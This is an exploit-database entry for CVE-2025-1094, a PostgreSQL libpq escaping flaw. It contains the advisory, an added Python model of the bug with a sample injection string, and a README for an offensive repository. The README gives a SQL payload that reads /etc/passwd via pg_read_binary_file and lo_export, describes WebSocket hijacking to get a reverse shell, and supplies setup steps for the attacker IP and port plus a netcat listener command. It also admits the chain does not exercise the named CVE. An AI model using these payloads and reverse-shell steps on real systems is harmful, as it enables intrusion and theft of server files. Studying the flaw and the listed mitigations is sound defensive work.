PoC details: dd0fddd7ec3a2a2efdeff6b4c3f7d88299550939

Source
Related vulnerability
Title: PostgreSQL quoting APIs miss neutralizing quoting syntax in text that fails encoding validation (CVE-2025-1094)
Description: Improper neutralization of quoting syntax in the PostgreSQL libpq functions PQescapeLiteral(), PQescapeIdentifier(), PQescapeString() and PQescapeStringConn() allows a database input provider to achieve SQL injection in certain usage patterns. Specifically, SQL injection requires the application to use the function result to construct input to psql, the PostgreSQL interactive terminal. Similarly, improper neutralization of quoting syntax in the PostgreSQL command-line utility programs allows a source of command-line arguments to achieve SQL injection when client_encoding is BIG5 and server_encoding is EUC_TW or MULE_INTERNAL. Versions before PostgreSQL 17.3, 16.7, 15.11, 14.16 and 13.19 are affected.
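The advisory above says the quoting functions fail to neutralize quoting syntax when encoding validation fails. The following Python block is an added, simplified model of that bug class and is not libpq's code: an escaper that decides character length from a multibyte lead byte and copies those bytes verbatim, so a single quote sitting where a continuation byte should be passes through undoubled, shown beside the hardened form that rejects invalid text before quoting. UTF-8 as the client encoding, the byte-oriented consumer in `sql_after_literal`, and the sample inputs are all assumptions made for the illustration.

```python
from typing import Optional

# Added illustration, not libpq's code: a simplified model of the bug class
# the advisory describes, using UTF-8 as the assumed client encoding.


def utf8_mblen(lead: int) -> int:
    """Character length implied by a UTF-8 lead byte, judged from the lead
    byte alone (mblen-style), without checking that the bytes that follow
    are valid continuation bytes."""
    if lead & 0xE0 == 0xC0:
        return 2
    if lead & 0xF0 == 0xE0:
        return 3
    if lead & 0xF8 == 0xF0:
        return 4
    return 1


def escape_literal_unvalidated(raw: bytes) -> bytes:
    """Quote a literal, doubling single quotes, but trust the lead byte:
    the bytes a multibyte lead byte claims are copied verbatim. Without
    encoding validation, a quote sitting where a continuation byte should
    be is copied through undoubled (the failure mode in the advisory)."""
    out = bytearray(b"'")
    i = 0
    while i < len(raw):
        n = utf8_mblen(raw[i])
        if n > 1:
            out += raw[i:i + n]          # copied without inspection
            i += n
        else:
            out += b"''" if raw[i] == 0x27 else raw[i:i + 1]
            i += 1
    out += b"'"
    return bytes(out)


def escape_literal_validated(raw: bytes) -> bytes:
    """Hardened form: reject text that is not valid in the client encoding
    before quoting it (the fixed libpq reports an error instead of returning
    a partially escaped string)."""
    raw.decode("utf-8")  # raises UnicodeDecodeError on invalid input
    # Valid UTF-8 never has a quote in a continuation slot, so the
    # verbatim-copy path above is safe once the input has been validated.
    return escape_literal_unvalidated(raw)


def sql_after_literal(buf: bytes) -> Optional[bytes]:
    """What a byte-oriented consumer treats as SQL after the literal that
    starts at buf[0], or None if the literal never closes. Doubled quotes
    stay inside the literal; the first lone quote ends it."""
    assert buf[:1] == b"'"
    i = 1
    while i < len(buf):
        if buf[i] == 0x27:
            if buf[i + 1:i + 2] == b"'":
                i += 2
                continue
            return buf[i + 1:]
        i += 1
    return None


# Constructed sample inputs for the illustration (not from the original page):
# a dangling 2-byte lead byte followed by a quote, and a benign valid string.
ATTACKER_INPUT = b"\xc0' OR 1=1 --"
BENIGN_INPUT = b"caf\xc3\xa9 O'Reilly"

if __name__ == "__main__":
    bad = escape_literal_unvalidated(ATTACKER_INPUT)
    print(bad, "->", sql_after_literal(bad))       # tail escapes the literal
    good = escape_literal_unvalidated(BENIGN_INPUT)
    print(good, "->", sql_after_literal(good))     # b'': nothing leaks out
    try:
        escape_literal_validated(ATTACKER_INPUT)
    except UnicodeDecodeError as exc:
        print("validated escaper refused the input:", exc)
```

The design point is that validation has to happen before quoting, not after: once the undoubled quote is in the output, no downstream consumer can tell it apart from the closing delimiter. A caller of the real libpq functions should likewise treat a reported escaping error as fatal rather than use whatever partial string came back.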
Description
WebSocket and SQL Injection Exploit Script
Introduction
# CVE-2025-1094: SQL Injection to RCE via WebSocket 🚀

This repository contains a proof-of-concept (PoC) exploit published under the name **CVE-2025-1094**. Note that CVE-2025-1094 itself is the libpq quoting-function bug described in the advisory above (quoting syntax not neutralized when encoding validation fails). The chain in this README, an SQL injection (SQLi) against a PostgreSQL-backed endpoint that is then escalated to remote code execution (RCE) by hijacking a WebSocket connection, is the repository's post-injection tooling; nothing in it exercises the encoding-validation flaw directly.

## Overview

This exploit uses an SQL injection point in an application backed by PostgreSQL to run a payload that reads sensitive files, such as `/etc/passwd`, and copies them to another path on the database server. The exploit then hijacks an active WebSocket connection to execute arbitrary commands, ultimately obtaining a reverse shell on the compromised server.

## Vulnerability Details

- **CVE ID**: CVE-2025-1094
- **Vulnerable System**: PostgreSQL before 17.3, 16.7, 15.11, 14.16 and 13.19 (libpq quoting functions); the file-reading payload below additionally requires a database role allowed to call `pg_read_binary_file` and `lo_export` (superuser by default)
- **Exploit Path**: SQL Injection → WebSocket Hijacking → Remote Code Execution (RCE)

## How It Works

1. **SQL Injection (SQLi)**: The attack begins by injecting SQL into a vulnerable endpoint of the application. The payload uses `lo_export` to write a copy of a sensitive server file to a path on the database server.
   
2. **WebSocket Hijacking**: The attacker takes over an open WebSocket connection (the script takes its URL as the `WEBSOCKET_URL` parameter; the README does not describe how that session is obtained or authenticated) and sends a payload that triggers the RCE. This opens a reverse shell back to the attacker's system.

3. **Remote Code Execution (RCE)**: The reverse shell gives the attacker full control over the server, allowing further exploitation.

## PoC (Proof of Concept)

```sql
-- pg_read_file() returns text and lo_export() takes a large-object OID, so the
-- original call failed on type errors; read as bytea and wrap in a large object.
SELECT lo_export(lo_from_bytea(0, pg_read_binary_file('/etc/passwd')), '/tmp/payload');
```

The payload above copies `/etc/passwd` to `/tmp/payload` on the database server itself; nothing is returned to the attacker at this step, and it only works for a role that may call `pg_read_binary_file` and `lo_export` (superuser by default, or explicit grants plus membership in `pg_read_server_files`). Once the file is in place, the exploit uses WebSocket hijacking to establish a reverse shell.

## How to Use

1. Clone the repository:

   ```bash
   git clone https://github.com/soltanali0/CVE-2025-1094.git
   cd CVE-2025-1094
   ```

2. Modify the following variables in `exploit.py`:

   - `REVERSE_IP`: Your attacker's IP address
   - `REVERSE_PORT`: The port on which your listener is running
   - `TARGET_URL`: The vulnerable endpoint to attack
   - `WEBSOCKET_URL`: The WebSocket URL to hijack

3. Start your netcat listener on the specified port before running the script, so the reverse shell has something to connect back to:

   ```bash
   nc -lvnp <REVERSE_PORT>
   ```

4. Run the script to exploit the vulnerability; the reverse shell should arrive at the listener.

## Mitigation

To protect against this vulnerability:

- **Use Prepared Statements**: Replace dynamically concatenated SQL with parameterized queries, so untrusted input never passes through string escaping at all.
- **Validate User Inputs**: Validate input in the expected client encoding and reject invalid byte sequences; the CVE is precisely about escaping functions that did not do this. Treat an error returned by the escaping function as fatal rather than using a partial result.
- **Restrict PostgreSQL Functions**: `lo_export` and `pg_read_binary_file` are superuser-only by default; do not run the application under a superuser role and do not grant these functions to application roles.
- **Secure WebSocket Connections**: Ensure WebSocket connections are authenticated, bound to a session, and carried over TLS.
- **Keep PostgreSQL Updated**: The fix ships in PostgreSQL 17.3, 16.7, 15.11, 14.16 and 13.19. Because the bug is in libpq and the command-line utilities, update client libraries and tools as well as the server, and review your PostgreSQL configuration.

## Disclaimer

This exploit is intended for educational purposes only. Ensure that you have explicit permission before testing any system with this exploit. Unauthorized access to computer systems is illegal.

File snapshot

[4.0K] /data/pocs/dd0fddd7ec3a2a2efdeff6b4c3f7d88299550939
├── [1.7K] exploit.py
└── [3.0K] README.md
0 directories, 2 files